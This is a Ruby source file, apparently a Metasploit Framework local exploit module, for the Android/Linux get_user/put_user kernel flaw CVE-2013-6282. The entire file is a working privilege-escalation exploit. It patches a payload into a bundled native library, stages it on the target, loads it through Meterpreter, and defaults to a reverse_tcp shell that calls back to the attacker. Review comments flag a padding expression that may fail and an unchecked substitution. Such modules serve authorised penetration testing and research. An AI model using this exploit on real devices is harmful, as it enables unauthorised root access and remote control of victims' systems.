##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege escalation for Android/Linux kernels affected by
# CVE-2013-6282 (missing address checks in get_user/put_user). The kernel
# exploitation itself lives in a prebuilt native library shipped in the
# framework data directory; this module only patches the payload into that
# library, stages it on the target, and loads it through Meterpreter.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  # Registers the module metadata: name, description, authors, references,
  # supported platforms/session types, payload constraints, the Meterpreter
  # commands the module relies on, and the side-effect/reliability notes.
  #
  # @param info [Hash] additional module info merged in by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Android get_user/put_user Exploit',
        'Description' => %q{
          This module exploits a missing check in the get_user and put_user API functions
          in the linux kernel before 3.5.5. The missing checks on these functions
          allow an unprivileged user to read and write kernel memory.
          This exploit first reads the kernel memory to identify the commit_creds and
          ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
          The exploit was first discovered in the wild in the vroot rooting application.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'fi01', # libget_user_exploit / libput_user_exploit
          'cubeundcube', # kallsyms_in_memory
          'timwr', # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-6282' ],
          [ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
          [ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
        ],
        'DisclosureDate' => '2013-09-06',
        'SessionTypes' => [ 'meterpreter' ],
        'Platform' => [ 'android', 'linux' ],
        'Targets' => [[ 'Automatic', {}]],
        # `exploit` looks for a placeholder of exactly this many bytes inside
        # the bundled .so (via payload_space) and overwrites it with the
        # encoded payload, so the payload must fit in this region.
        'Payload' => { 'Space' => 2048 },
        'DefaultOptions' => {
          # Seconds to wait for the payload to call back after the library
          # is loaded (reported by `exploit` once staging is done).
          'WfsDelay' => 120,
          'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
        },
        'DefaultTarget' => 0,
        # Meterpreter commands used by `exploit`: core_loadlib to load the
        # staged library, stdapi_fs_getwd to pick the staging directory, and
        # stdapi_fs_delete_file to remove the library afterwards.
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_loadlib
              stdapi_fs_delete_file
              stdapi_fs_getwd
            ]
          }
        },
        'Notes' => {
          # The patched library is written to the target filesystem before
          # loading (it is deleted again, but it does touch disk).
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        }
      )
    )
  end

  # Stages and loads the prebuilt exploit library on the target.
  #
  # Steps, as implemented below:
  #   1. read data/exploits/CVE-2013-6282.so from the framework data directory;
  #   2. replace the library's payload placeholder (4 NOP bytes followed by
  #      zeros, `payload_space` bytes in total) with the encoded payload;
  #   3. write the patched library under a random name in the session's
  #      current working directory (the ARTIFACTS_ON_DISK side effect);
  #   4. load it through Meterpreter's core_loadlib and delete the file;
  #   5. report that the module is waiting WfsDelay seconds for the payload.
  def exploit
    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-6282.so')
    # Binary read: the library is patched byte-for-byte below.
    exploit_data = File.read(local_file, mode: 'rb')

    space = payload_space
    payload_encoded = payload.encoded

    # Substitute the exploit shellcode with our own.
    # NOTE(review): the trailing pad is `"\x90" * (payload_encoded.length - space)`,
    # and String#* raises ArgumentError on a negative count, so this line only
    # works when the encoded payload is at least `space` bytes long. It looks
    # like the intent is to pad the payload up to `space`; presumably the
    # framework already NOP-pads payload.encoded to exactly 'Space' so the
    # count is zero in practice -- confirm. gsub! returns nil when the
    # placeholder is absent and that result is not checked, so an unexpected
    # library layout would load the unmodified .so.
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    # Stage the patched library next to the session's current directory
    # under a short random name.
    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    # The file was already written by write_file above, so core_loadlib is
    # told not to upload it again and to load it straight from TargetFilePath.
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    # Remove the on-disk copy once the library has been loaded.
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end